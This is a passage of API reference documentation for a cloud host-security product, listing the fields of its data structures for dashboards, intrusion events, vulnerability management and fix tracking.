Used by actions: DescribeScreenHostInvasion.
Name | Type | Description |
---|---|---|
Id | Integer | Log ID |
Uuid | String | Client ID |
SrcIp | String | Source IP |
SrcPort | Integer | Source port |
HttpMethod | String | Attack method |
VulType | String | Threat type |
CreatedTime | String | Attack time |
DstPort | Integer | Target port |
Quuid | String | Host quuid |
DstIp | String | Target IP |
Visualized emergency notification on the large screen
Used by actions: DescribeScreenEmergentMsg.
Name | Type | Description |
---|---|---|
Title | String | Notification tag/title |
Text | String | Notification content |
Type | Integer | Redirection type: 0=vulnerability management |
Intrusion detection statistics
Used by actions: DescribeScreenEventsCnt.
Name | Type | Description |
---|---|---|
Title | String | Displayed content: Total number of pending risks and total number of affected assets |
Total | Integer | Total number of events |
Category | Array of ScreenNameValue | name: Specific type of the displayed content, including attack event, potential risk, compromised asset, and potentially risky asset Value: event count after statistics |
Details of large screen intrusion event
Used by actions: DescribeScreenHostInvasion.
Name | Type | Description |
---|---|---|
CreatedTime | String | Intrusion time |
EventType | Integer | Event type. 0: virus scanning; 1: abnormal log-in; 2: password cracking; 3: malicious request; 4: high-risk command; 5: local privilege escalation; 6: reverse shell. |
Content | String | JSON file of the event data, which varies by event. [Virus scanning] Virus name: VirusName, file name: FileName, file path: FilePath, file size: FileSize, file MD5: MD5, first detection time: CreateTime, last detection time: LatestScanTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme [Abnormal log-in] Source IP: SrcIp, location: Location, log-in username: UserName, log-in time: LoginTime [Password cracking]Source IP: SrcIp, location: City and Country, protocol: Protocol, log-in username: UserName, port: Port, attempt count: Count, first attack time: CreateTime, last attack time: ModifyTime [Malicious request] Malicious request domain name: Url, process: ProcessName, MD5: ProcessMd5, PID: Pid, request count: AccessCount, last request time: MergeTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme [High-risk command] Hit rule name: RuleName, rule category: RuleCategory, command content: BashCmd, data source: DetectBy, Log-in user: User, PID: Pid, occurrence time: CreateTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme [Local privilege escalation] Privilege escalation user: UserName, parent process: ParentProcName, user of parent process: ParentProcGroup, Detection time: CreateTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme [Reverse shell] Connected process: ProcessName, executed command: CmdLine, parent process: ParentProcName, target host: DstIp, target port: DstPort, detection time: CreateTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme |
Level | Integer | Unified event risk level. 0: prompt; 1: low; 2: medium; 3: high; 4: critical. |
LevelZh | String | Level in Chinese |
Id | Integer | Event ID |
Uuid | String | Host UUID |
Data of listed hosts on the large screen
Used by actions: DescribeScreenMachines.
Name | Type | Description |
---|---|---|
MachineName | String | Host name. |
MachineOs | String | Host System. |
Uuid | String | Yunjing client UUID. If the client is offline for a long time, an empty string is returned. |
MachineStatus | Integer | Status of a host on the large screen. 0: agent not installed; 1: offline; 2: offline - risky; 3: offline - critical; 4: device installed - normal; 5: device installed - normal and of either Pro Edition or Ultimate Edition; 6: device installed - risky (network attack events > 0); 7: device installed - risky (network attack events > 0) and of either Pro Edition or Ultimate Edition; 8: device installed - critical (intrusion detection events > 0); 9: device installed - critical (intrusion detection events > 0) and of either Pro Edition or Ultimate Edition |
Quuid | String | CVM or BM Machine Unique UUID. |
VulNum | Integer | Number of vulnerabilities |
MachineIp | String | Host IP. |
MachineWanIp | String | Public IP address of the host |
BaselineNum | Integer | Number of baseline risks |
CyberAttackNum | Integer | Number of network risks |
SecurityStatus | String | Risk status |
InvasionNum | Integer | Number of intrusion events |
MachineType | String | Machine Zone Type. CVM - Cloud Virtual Machine; BM: Bare Metal; ECM: Edge Computing Machine; LH: Lightweight Application Server; Other: Hybrid Cloud Zone |
CpuLoad | String | CPU load status |
CpuSize | Float | Number of CPU cores |
DiskLoad | String | Hard disk utilization (%) |
DiskSize | Float | Hard disk capacity (GB) |
MemLoad | String | Memory utilization (%) |
MemSize | Float | Memory capacity (GB) |
CoreVersion | String | Kernel version |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
[Cloud security alarm] Visualized data Name Value Data on the large screen
Used by actions: DescribeScreenEventsCnt, DescribeScreenGeneralStat, DescribeScreenRiskAssetsTop.
Name | Type | Description |
---|---|---|
Name | String | Statistics type: Different APIs correspond to different content |
Value | Integer | Statistics quantity |
Visualized attack and defense status on large screen
Used by actions: DescribeScreenProtectionStat.
Name | Type | Description |
---|---|---|
Name | String | Type value: virus scanning, brute force cracking, vulnerability scan, baseline check |
Status | Integer | Virus scanning: 0: never scanned or asset not paid; 1: scanned and malicious files found; 2: scanned but isolation protection disabled; 3: scanned, protection enabled, and no risk found. Brute force cracking: 0: protection disabled (asset not paid); 1: automatic blocking enabled. Vulnerability scan: 0: never scanned or asset not paid; 1: vulnerability found; 2: no risk found. Baseline check: 0: never checked or asset not paid; 1: baseline risks found; 2: no risk found. |
CWPP security trend data
Used by actions: DescribeScreenProtectionCnt.
Name | Type | Description |
---|---|---|
Type | String | cloud: Cloud Security Engine; detect: detection engine; defend: attack defense; threat: threat intelligence; analysis: abnormal analysis; ai: AI engine |
Name | String | cloud: Cloud Security Engine; detect: detection engine; defend: attack defense; threat: threat intelligence; analysis: abnormal analysis; ai: AI engine |
Count | Integer | Total number |
Region information
Used by actions: DescribeScreenMachineRegions.
Name | Type | Description |
---|---|---|
Region | String | Region identifiers, such as ap-guangzhou, ap-shanghai, and ap-beijing |
RegionName | String | Chinese name of region, such as South China (Guangzhou), East China (Shanghai Finance), and North China (Beijing) |
RegionId | Integer | Region ID |
RegionCode | String | Region code, such as gz, sh, and bj |
RegionNameEn | String | English name of the region |
3D image of the host on the large screen
Used by actions: DescribeScreenMachines.
Name | Type | Description |
---|---|---|
Region | String | All regions |
RegionName | String | Region description in Chinese |
Machines | Array of ScreenMachine | Host list |
TotalCount | Integer | Total number of hosts in this region |
RiskCnt | Integer | Number of risky hosts |
AttackCnt | Integer | Number of potentially risky hosts |
SafetyCnt | Integer | Number of risk-free hosts |
UnAgentOfflineCnt | Integer | Number of hosts in offline/uninstalled status |
IgnoreCnt | Integer | Number of hosts that are omitted from displaying. When it is equal to 0, no hosts are omitted. |
Attack and defense trend chart on the large screen
Used by actions: DescribeScreenDefenseTrends.
Name | Type | Description |
---|---|---|
X | String | Time on the X-axis |
Y | Integer | Numerical value on the Y-axis |
Type | String | Statistical type: defense count, attack count |
Vulnerability list on big screen
Used by actions: DescribeScreenHostInvasion.
Name | Type | Description |
---|---|---|
Id | Integer | Vulnerability Event ID |
Name | String | Vulnerability name |
VulId | Integer | Vulnerability ID |
LastTime | String | Last detection Time |
Level | Integer | Vulnerability level 1: low-risk; 2: medium-risk; 3: high-risk; 4: prompt |
Category | Integer | Vulnerability type: 1 - web-cms vulnerabilities; 2 - application vulnerabilities; 4 - Linux software vulnerabilities; 5 - Windows system vulnerabilities Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
Quick search template
Used by actions: CreateSearchTemplate, DescribeSearchTemplates.
Name | Type | Required | Description |
---|---|---|---|
Name | String | Yes | Name for search |
LogType | String | Yes | Index type for search |
Condition | String | Yes | Statement for search |
TimeRange | String | Yes | Time range |
Query | String | Yes | Converted search statement content |
Flag | String | Yes | Search method. Input box: standard filtering. Search: simple. |
DisplayData | String | Yes | Displayed data |
Id | Integer | No | Rule ID |
List of security manager information
Used by actions: DescribeExpertServiceList.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
OrderId | Integer | Order ID |
Quuid | String | cvm id |
Status | Integer | Service status. 0: in service; 1: expired; 2: terminated. |
StartTime | String | Service start time |
EndTime | String | Service end time |
HostName | String | Host name |
HostIp | String | Host IP address |
Uuid | String | Host UUID |
RiskCount | Integer | Number of host risks |
Security event message data
Used by actions: DescribeSecurityDynamics.
Name | Type | Description |
---|---|---|
Uuid | String | CWPP client UUID |
EventTime | Timestamp | Security event occurrence time |
EventType | String | Security event type |
Message | String | Security event message |
SecurityLevel | String | Security event level |
List of security event statistics
Used by actions: DescribeSecurityEventsCnt.
Name | Type | Description |
---|---|---|
EventCnt | Integer | Number of security events |
UuidCnt | Integer | Number of affected machines |
Security trend statistics
Used by actions: DescribeSecurityTrends.
Name | Type | Description |
---|---|---|
Date | Date | Event time |
EventNum | Integer | Number of events |
Blocking configuration in the standard mode
Used by actions: DescribeBanMode.
Name | Type | Description |
---|---|---|
Ttl | Integer | Blocking duration (unit: second) |
Baseline security user policy information
Used by actions: DescribeBaselineStrategyList.
Name | Type | Description |
---|---|---|
StrategyName | String | Policy name Note: This field may return null, indicating that no valid values can be obtained. |
StrategyId | Integer | Policy ID Note: This field may return null, indicating that no valid values can be obtained. |
RuleCount | Integer | Total number of baseline detection items Note: This field may return null, indicating that no valid values can be obtained. |
HostCount | Integer | Number of Hosts Note: This field may return null, indicating that no valid values can be obtained. |
ScanCycle | Integer | Scan cycle Note: This field may return null, indicating that no valid values can be obtained. |
ScanAt | String | Scan time Note: This field may return null, indicating that no valid values can be obtained. |
Enabled | Integer | Available or not? Note: This field may return null, indicating that no valid values can be obtained. |
PassRate | Integer | Pass rate Note: This field may return null, indicating that no valid values can be obtained. |
CategoryIds | String | Baseline ID Note: This field may return null, indicating that no valid values can be obtained. |
IsDefault | Integer | Whether a default policy Note: This field may return null, indicating that no valid values can be obtained. |
Tag information
Used by actions: DescribeRansomDefenseMachineList, DescribeRansomDefenseStrategyMachines, DescribeTags.
Name | Type | Description |
---|---|---|
Id | Integer | Tag ID |
Name | String | Tag name |
Count | Integer | Number of servers |
Information on tag-related servers
Used by actions: DescribeTagMachines.
Name | Type | Description |
---|---|---|
Id | String | ID |
Quuid | String | Host ID |
MachineName | String | Host name |
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
MachineRegion | String | Host region |
MachineType | String | Host region type |
Platform tag
Used by actions: CreateLicenseOrder, DescribeHostInfo, DescribeLicenseList, DescribeMachines, DescribeMachinesSimple, DescribeVulEffectHostList, ExportLicenseDetail.
Name | Type | Required | Description |
---|---|---|---|
TagKey | String | Yes | Tag key |
TagValue | String | Yes | Tag value |
Scan status list
Used by actions: DescribeScanTaskStatus.
Name | Type | Description |
---|---|---|
Scanning | String | Scanning (including initializing) |
Ok | String | Scan terminated (including terminating) |
Fail | String | Scan failed |
Stop | String | Scan failed, with specific reason displayed: scan timeout, low client version, or client offline Note: This field may return null, indicating that no valid values can be obtained. |
Statistics data of top network attacks
Used by actions: DescribeAttackTop.
Name | Type | Description |
---|---|---|
Value | String | Top statistical data, such as IP, and vulnerability name |
Count | Integer | Top statistical count |
Edit allowlisted entities
Used by actions: ModifyLoginWhiteInfo.
Name | Type | Required | Description |
---|---|---|---|
Places | Array of Place | Yes | Region information array |
SrcIp | String | Yes | Source IP |
UserName | String | Yes | Username |
Remark | String | Yes | Remarks |
Id | Integer | Yes | Data ID to be updated |
StartTime | String | No | Start time |
EndTime | String | No | End time |
Frequently used log-in location
Used by actions: DescribeUsualLoginPlaces.
Name | Type | Description |
---|---|---|
Id | Integer | ID |
Uuid | String | CWPP client UUID |
CountryId | Integer | Country ID |
ProvinceId | Integer | Province ID |
CityId | Integer | City ID |
Index value description
Used by actions: DescribeLogIndex.
Name | Type | Description |
---|---|---|
Tokenizer | String | Field delimiter |
Type | String | Field type |
SqlFlag | Boolean | Whether the analysis feature is enabled for the field |
ContainZH | Boolean | Whether Chinese characters are contained |
Allowlist configuration of the authorized edition
Used by actions: DescribeLicenseWhiteConfig.
Name | Type | Description |
---|---|---|
Deadline | Integer | Number of days before expiration |
LicenseNum | Integer | Number of authorizations |
IsApplyFor | Boolean | Whether application can be made |
SourceType | Integer | Type |
Detailed node information
Used by actions: DescribeVertexDetail.
Name | Type | Description |
---|---|---|
Type | Integer | Node type. process - 1; network - 2; file - 3; SSH - 4 Note: This field may return null, indicating that no valid values can be obtained. |
Time | String | Time used for each node type, which is in the format of 2022-11-29 00:00:00. Note: This field may return null, indicating that no valid values can be obtained. |
AlarmInfo | Array of AlarmInfo | Alarm information Note: This field may return null, indicating that no valid values can be obtained. |
ProcName | String | Process name, which is effective when the node type is process. Note: This field may return null, indicating that no valid values can be obtained. |
CmdLine | String | Command line, which is effective when the node type is process. Note: This field may return null, indicating that no valid values can be obtained. |
Pid | String | Process ID, which is effective when the node type is process. Note: This field may return null, indicating that no valid values can be obtained. |
FileMd5 | String | File MD5, which is effective when the node type is file. Note: This field may return null, indicating that no valid values can be obtained. |
FileContent | String | Content written to the file, which is effective when the node type is file. Note: This field may return null, indicating that no valid values can be obtained. |
FilePath | String | File path, which is effective when the node type is file. Note: This field may return null, indicating that no valid values can be obtained. |
FileCreateTime | String | File creation time, which is effective when the node type is file. Note: This field may return null, indicating that no valid values can be obtained. |
Address | String | Request destination address, which is effective when the node type is network. Note: This field may return null, indicating that no valid values can be obtained. |
DstPort | Integer | Target port, which is effective when the node type is network. Note: This field may return null, indicating that no valid values can be obtained. |
SrcIP | String | Log-in source IP, which is effective when the node type is SSH. Note: This field may return null, indicating that no valid values can be obtained. |
User | String | Log-in username and user group, which is effective when the node type is SSH. Note: This field may return null, indicating that no valid values can be obtained. |
VulName | String | Vulnerability name, which is effective when the node type is vulnerability. Note: This field may return null, indicating that no valid values can be obtained. |
VulTime | String | Vulnerability exploitation time, which is effective when the node type is vulnerability. Note: This field may return null, indicating that no valid values can be obtained. |
HttpContent | String | HTTP request content, which is effective when the node type is vulnerability. Note: This field may return null, indicating that no valid values can be obtained. |
VulSrcIP | String | Vulnerability exploiter source IP, which is effective when the node type is vulnerability. Note: This field may return null, indicating that no valid values can be obtained. |
VertexId | String | Node ID Note: This field may return null, indicating that no valid values can be obtained. |
Attack backtracking node information
Used by actions: DescribeAlarmIncidentNodes.
Name | Type | Description |
---|---|---|
Type | Integer | Node type: process: 1; network: 2; file: 3; ssh: 4; |
Vid | String | VID contained in this node |
ParentVid | String | Parent node VID of this node |
IsLeaf | Boolean | Whether a leaf node |
ProcNamePrefix | String | Process name, used when Type=1 Note: This field may return null, indicating that no valid values can be obtained. |
ProcNameMd5 | String | Process name MD5, used when Type=1 Note: This field may return null, indicating that no valid values can be obtained. |
CmdLinePrefix | String | Command line, used when Type=1 Note: This field may return null, indicating that no valid values can be obtained. |
CmdLineMd5 | String | Command line MD5, used when Type=1 Note: This field may return null, indicating that no valid values can be obtained. |
FilePathPrefix | String | File path, used when Type=3 Note: This field may return null, indicating that no valid values can be obtained. |
AddressPrefix | String | Request destination address, used when Type=2 Note: This field may return null, indicating that no valid values can be obtained. |
IsWeDetect | Boolean | Whether a vulnerability node |
IsAlarm | Boolean | Whether an alarm node |
FilePathMd5 | String | File path MD5, used when Type=3 Note: This field may return null, indicating that no valid values can be obtained. |
AddressMd5 | String | Request destination address MD5, used when Type=2 Note: This field may return null, indicating that no valid values can be obtained. |
Vulnerability details
Used by actions: DescribeVulDefenceEvent.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
VulName | String | Vulnerability name |
CveId | String | CVE ID |
Id | Integer | Vulnerability event ID |
Quuid | String | Host QUUID |
Alias | String | Host name |
PrivateIp | String | Private IP address |
PublicIp | String | Public IP address |
EventType | Integer | 0: Attack Attempt (WeDetect); 1: Successful Attack Attempt (WeDetect); 2: RASP Defense Event |
SourceIp | String | Attack source IP address |
City | String | City of the attack source IP address |
SourcePort | Array of Integer | Attack source port |
CreateTime | String | Event Creation Time |
MergeTime | String | Update Event Time |
Count | Integer | Number of Occurrences |
Status | Integer | Status. 0: Pending; 1: Defended; 2: Processed; 3: Ignored; 4: Deleted |
UpgradeType | Integer | 0: Pro Edition; 1: Ultimate Edition; 2: LH Inclusive Edition (for Lighthouse only); 3: CVM Inclusive Edition (for CVM only). |
FixType | Integer | 0: do not support fixing; 1: support fixing. |
Uuid | String | Host UUID |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Vulnerability details
Used by actions: DescribeDefenceEventDetail.
Name | Type | Description |
---|---|---|
VulName | String | Vulnerability name |
CveId | String | CVE ID |
Id | Integer | Vulnerability Event ID |
Quuid | String | Host QUUID |
Alias | String | Host name |
PrivateIp | String | Private IP address |
PublicIp | String | Public IP address |
EventType | Integer | 0: Attack Attempt (WeDetect); 1: Successful Attack Attempt (WeDetect); 2: RASP Defense Event |
SourceIp | String | Attack source IP address |
City | String | City of the attack source IP address |
SourcePort | Array of Integer | Attack source port Note: This field may return null, indicating that no valid values can be obtained. |
CreateTime | String | Event Creation Time |
MergeTime | String | Update Event Time |
Count | Integer | Number of Occurrences |
Status | Integer | Status. 0: Pending; 1: Defended; 2: Processed; 3: Ignored; 4: Deleted |
MachineStatus | String | ONLINE OFFLINE |
Description | String | Vulnerability Description Information |
Fix | String | Fixing suggestion |
NetworkPayload | String | Attack Payload |
Pid | Integer | Associated Process PID |
MainClass | String | Associated Process Main Class Name |
StackTrace | String | Stack Information (Unique for RASP) |
EventDetail | String | Vulnerability ID-Related Event Details (JSON array format, unique to RASP) |
ExceptionPstree | String | Host Compromise Event Process Tree (JSON format, unique to WeDetect) |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Vulnerability defense trend page, which includes plugin status and attack defense trends. Trends are stored in three arrays of equal length, with elements corresponding one-to-one. If a certain day is missed, there will be missing data.
Used by actions: DescribeVulDefenceOverview.
Name | Type | Description |
---|---|---|
Enable | Integer | Defense switch: 0 - disable; 1 - enable |
DefendHostCount | Integer | Number of hosts with defense enabled |
ExceptionCount | Integer | Number of plugin exceptions |
AttackCounts | Array of Integer | Daily attack trends Note: This field may return null, indicating that no valid values can be obtained. |
DefendCounts | Array of Integer | Daily defense trends Note: This field may return null, indicating that no valid values can be obtained. |
Date | Array of String | Date Note: This field may return null, indicating that no valid values can be obtained. |
vulnerability defense plugin status of a single process
Used by actions: DescribeVulDefencePluginDetail.
Name | Type | Description |
---|---|---|
Pid | Integer | ID of the injected process |
MainClass | String | Main class name of the injected process |
Status | Integer | Plugin status. 0: injecting; 1: injection successful; 2: plugin timed out, 3: plugin exited; 4: injection failed; 5: logically deleted. |
ErrorLog | String | Error log |
InjectLog | String | Injection log |
Host vulnerability defense plugin information
Used by actions: DescribeVulDefencePluginStatus.
Name | Type | Description |
---|---|---|
Quuid | String | Host QUUID |
Alias | String | Host alias |
PrivateIp | String | Private IP address |
PublicIp | String | Public IP address |
Exception | Integer | Plugin status: 0 - normal; 1 - abnormal |
CreateTime | String | Creation time |
ModifyTime | String | Last update time |
Vulnerability defense scope details
Used by actions: DescribeVulDefenceList.
Name | Type | Description |
---|---|---|
VulName | String | Vulnerability name |
Label | String | Tag |
Level | Integer | Vulnerability level. 1: low-risk; 2: medium-risk; 3: high-risk; 4: critical. |
CvssScore | Float | CVSS score |
CveId | String | cve id |
PublishTime | String | Release time |
VulId | Integer | Vulnerability ID |
Vulnerability details
Used by actions: DescribeScanTaskDetails.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
Level | Integer | Vulnerability level |
Name | String | Vulnerability name |
CveId | String | CVE ID |
VulCategory | Integer | 1: web-cms vulnerabilities; 2: application vulnerabilities; 4: Linux software vulnerabilities; 5: Windows system vulnerabilities; 0: emergency vulnerabilities |
Descript | String | Vulnerability description |
Fix | String | Fixing suggestion |
Reference | String | Reference link |
CvssScore | Float | CVSS score |
Cvss | String | CVSS details |
PublishTime | String | Release time |
List of hosts affected by vulnerabilities
Used by actions: DescribeVulEffectHostList.
Name | Type | Description |
---|---|---|
EventId | Integer | Event ID Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Status. 0: pending; 1: ignored; 3: fixed; 5: detecting; 6: fixing; 7: rolling back; 8: fixing failed.Note: This field may return null, indicating that no valid values can be obtained. |
LastTime | String | Last detection time Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Hazard level: 1-Low-risk; 2-Medium-risk; 3-High-risk; 4-Critical Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host IP address Note: This field may return null, indicating that no valid values can be obtained. |
AliasName | String | Host alias Note: This field may return null, indicating that no valid values can be obtained. |
Tags | Array of String | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Description | String | Description Note: This field may return null, indicating that no valid values can be obtained. |
HostVersion | Integer | Edition information. 0: Basic Edition; 1: Pro Edition; 2: Ultimate Edition; 3: Inclusive Edition.Note: This field may return null, indicating that no valid values can be obtained. |
IsSupportAutoFix | Integer | Whether automatic fixing is supported. 0: not supported; 1: supported; 2: client offline; 3: manual fixing supported for Ultimate Edition hosts; 4: not supported for this model; 5: fixing, 6: fixed; 7: detecting; 9: fixing failed; 10: ignored; 11: supported for Linux but not Windows; 12: supported for Windows but not Linux; 13: fixing failed but host is offline; 14: fixing failed but host is not of the Ultimate edition; 15: manually fixed.Note: This field may return null, indicating that no valid values can be obtained. |
FixStatusMsg | String | Failure cause Note: This field may return null, indicating that no valid values can be obtained. |
FirstDiscoveryTime | String | First detection time Note: This field may return null, indicating that no valid values can be obtained. |
InstanceState | String | Instance status. "PENDING": creating; "LAUNCH_FAILED" : creation failed; "RUNNING": running; "STOPPED": shut down; "STARTING": starting; "STOPPING": shutting down; "REBOOTING": restarting; "SHUTDOWN": shut down and pending termination; "TERMINATING": terminating.Note: This field may return null, indicating that no valid values can be obtained. |
PublicIpAddresses | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
CloudTags | Array of Tags | Cloud tag information Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host additional information Note: This field may return null, indicating that no valid values can be obtained. |
Details of components affected by vulnerabilities
Used by actions: DescribeVulEffectModules.
Name | Type | Description |
---|---|---|
Name | String | Component name |
Uuids | Array of String | Affected host uuid |
Rule | String | Affected component version |
Path | String | Component path |
Version | String | Component version |
FixCmd | String | Fix Command |
Quuids | Array of String | Affected host quuid |
Emergency notification entity
Used by actions: DescribeVulEmergentMsg.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
PublishTime | String | Vulnerability publish time |
Name | String | Vulnerability name |
View the fixing status of each vulnerability on each host.
Used by actions: DescribeVulFixStatus.
Name | Type | Description |
---|---|---|
HostName | String | Host name |
HostIp | String | Host IP |
Quuid | String | Host QUUID |
Status | Integer | Status. 0: initial status; 1: task issued (fixing); 2: completed (successful); 3: fixing failed (failed); 4: fixing failed due to snapshot creation failure (unfixed). |
ModifyTime | String | Fixing time |
FailReason | String | Fixing failure cause Note: This field may return null, indicating that no valid values can be obtained. |
View vulnerability fixing details
Used by actions: DescribeVulFixStatus.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID Note: This field may return null, indicating that no valid values can be obtained. |
VulName | String | Vulnerability name Note: This field may return null, indicating that no valid values can be obtained. |
Progress | Integer | Vulnerability fixing progress: 1-100; |
HostList | Array of VulFixStatusHostInfo | Vulnerability fixing status for corresponding hosts Note: This field may return null, indicating that no valid values can be obtained. |
FailCnt | Integer | Number of hosts with failed vulnerability fixing Note: This field may return null, indicating that no valid values can be obtained. |
FixSuccessCnt | Integer | Number of hosts with successful vulnerability fixing Note: This field may return null, indicating that no valid values can be obtained. |
FixMethod | Integer |
Machine snapshot information
Used by actions: DescribeVulFixStatus.
Name | Type | Description |
---|---|---|
Quuid | String | cvm id |
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host IP address Note: This field may return null, indicating that no valid values can be obtained. |
SnapshotName | String | Snapshot name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Snapshot creation time Note: This field may return null, indicating that no valid values can be obtained. |
SnapshotId | String | Snapshot ID Note: This field may return null, indicating that no valid values can be obtained. |
Id | Integer | Unique record ID |
Status | Integer | Snapshot status. 0: initial; 1: created successfully; 2: creation failed. |
FailReason | String | Snapshot creation failure reason Note: This field may return null, indicating that no valid values can be obtained. |
Top 5 server risk entities
Used by actions: DescribeVulHostTop.
Name | Type | Description |
---|---|---|
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
VulLevelList | Array of VulLevelCountInfo | Vulnerability level and quantity statistics list Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
Score | Integer | Top ratings Note: This field may return null, indicating that no valid values can be obtained. |
Query vulnerability details by cve_id
Used by actions: DescribeVulCveIdInfo.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
FixSwitch | Integer | Repair Support Status. 0-Neither Windows nor Linux supports for repair; 1-Both Windows and Linux support for repair; 2-Only Linux supports for repair; 3-Only Windows supports for repair. |
Fix vulnerability second popup in batch
Used by actions: DescribeCanFixVulMachine.
Name | Type | Description |
---|---|---|
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host IP Note: This field may return null, indicating that no valid values can be obtained. |
Tags | Array of String | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
IsSupportAutoFix | Integer | 0 - the vulnerability cannot be fixed automatically; 1 - the vulnerability can be fixed automatically; 2 - the client has been offline; 3 - the host is not the ultimate edition and can only be fixed manually; 4 - the model does not allow automatic fix; 5 - fixing; 6 - fixed; 7 - under detection; 9 - fix failed; 10 - ignored; 11 - the vulnerability is supported only on Linux, not on Windows; 12 - the vulnerability is supported only on Windows, not on Linux. Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
InstanceId | String | Host InstanceId Note: This field may return null, indicating that no valid values can be obtained. |
Vulnerability list on the vulnerability management page of CWPP
Used by actions: DescribeVulList.
Name | Type | Description |
---|---|---|
Ids | String | IDs of events corresponding to a vulnerability, separated by commas (,) |
Name | String | Vulnerability name |
Status | Integer | 0: pending; 1: ignored; 3: fixed; 5: detecting; 6: fixing; 8: fixing failed |
VulId | Integer | Vulnerability ID |
PublishTime | String | Vulnerability disclosure time |
LastTime | String | Last detection time |
HostCount | Integer | Number of affected hosts |
Level | Integer | Vulnerability level. 1: low-risk; 2: medium-risk; 3: high-risk; 4: critical. |
From | Integer | This field has been deprecated. Note: This field may return null, indicating that no valid values can be obtained. |
Descript | String | Description Note: This field may return null, indicating that no valid values can be obtained. |
PublishTimeWisteria | String | This field has been deprecated. Note: This field may return null, indicating that no valid values can be obtained. |
NameWisteria | String | This field has been deprecated. Note: This field may return null, indicating that no valid values can be obtained. |
DescriptWisteria | String | This field has been deprecated. Note: This field may return null, indicating that no valid values can be obtained. |
StatusStr | String | Event status after aggregation Note: This field may return null, indicating that no valid values can be obtained. |
CveId | String | CVE ID Note: This field may return null, indicating that no valid values can be obtained. |
CvssScore | Float | CVSS score Note: This field may return null, indicating that no valid values can be obtained. |
Labels | String | Vulnerability tags, separated by multiple commas Note: This field may return null, indicating that no valid values can be obtained. |
FixSwitch | Integer | Whether automatic fixing is supported and hosts that support automatic fixing are included. 0: no; 1: yes.Note: This field may return null, indicating that no valid values can be obtained. |
TaskId | Integer | ID of the last scan task Note: This field may return null, indicating that no valid values can be obtained. |
IsSupportDefense | Integer | Whether defense is supported. 0: not supported; 1: supported.Note: This field may return null, indicating that no valid values can be obtained. |
DefenseAttackCount | Integer | Number of attacks defended Note: This field may return null, indicating that no valid values can be obtained. |
FirstAppearTime | String | First occurrence time Note: This field may return null, indicating that no valid values can be obtained. |
VulCategory | Integer | Vulnerability category. 1: web CMS vulnerability; 2: application vulnerability; 4: Linux software vulnerability; 5: Windows system vulnerability.Note: This field may return null, indicating that no valid values can be obtained. |
AttackLevel | Integer | Attack intensity Note: This field may return null, indicating that no valid values can be obtained. |
FixNoNeedRestart | Boolean | Whether a restart is required after the vulnerability is fixed Note: This field may return null, indicating that no valid values can be obtained. |
Method | Integer | Detection method. 0: version comparison; 1: POC verification.Note: This field may return null, indicating that no valid values can be obtained. |
Number of vulnerability levels
Used by actions: DescribeVulHostTop.
Name | Type | Description |
---|---|---|
VulLevel | Integer | Vulnerability level |
VulCount | Integer | Number of vulnerabilities |
The statistical entity representing the distribution of vulnerabilities by severity level
Used by actions: DescribeVulLevelCount.
Name | Type | Description |
---|---|---|
VulLevel | Integer | // Severity level: 1 - low-risk; 2 - medium-risk; 3 - high-risk; 4 - critical |
Count | Integer | Quantity |
Vulnerability overview
Used by actions: DescribeVulOverview.
Name | Type | Description |
---|---|---|
TotalCount | Integer | Total number |
TodayCount | Integer | Number of new key-value pairs today |
Information on the vulnerability database list
Used by actions: DescribeHotVulTop, DescribeVulStoreList.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
Level | Integer | Vulnerability level |
Name | String | Vulnerability name |
CveId | String | CVE ID |
VulCategory | Integer | 1: web-cms vulnerabilities; 2: application vulnerabilities; 4: Linux software vulnerabilities; 5: Windows system vulnerabilities; 0: emergency vulnerabilities. |
PublishDate | String | Release time |
Method | Integer | Vulnerability Detection Method: 0 - Version Comparison, 1 - POC Verification |
AttackLevel | Integer | Vulnerability attack level |
FixSwitch | Integer | Whether automatic vulnerability fixing is supported 0: not supported on Windows/Linux; 1: supported on Windows/Linux; 2: supported on Linux only; 3: supported on Windows only. |
SupportDefense | Integer | Whether defense against vulnerabilities is supported 0: not supported; 1: supported. |
The statistical entity representing top vulnerabilities
Used by actions: DescribeVulTop.
Name | Type | Description |
---|---|---|
VulName | String | Vulnerability name Note: This field may return null, indicating that no valid values can be obtained. |
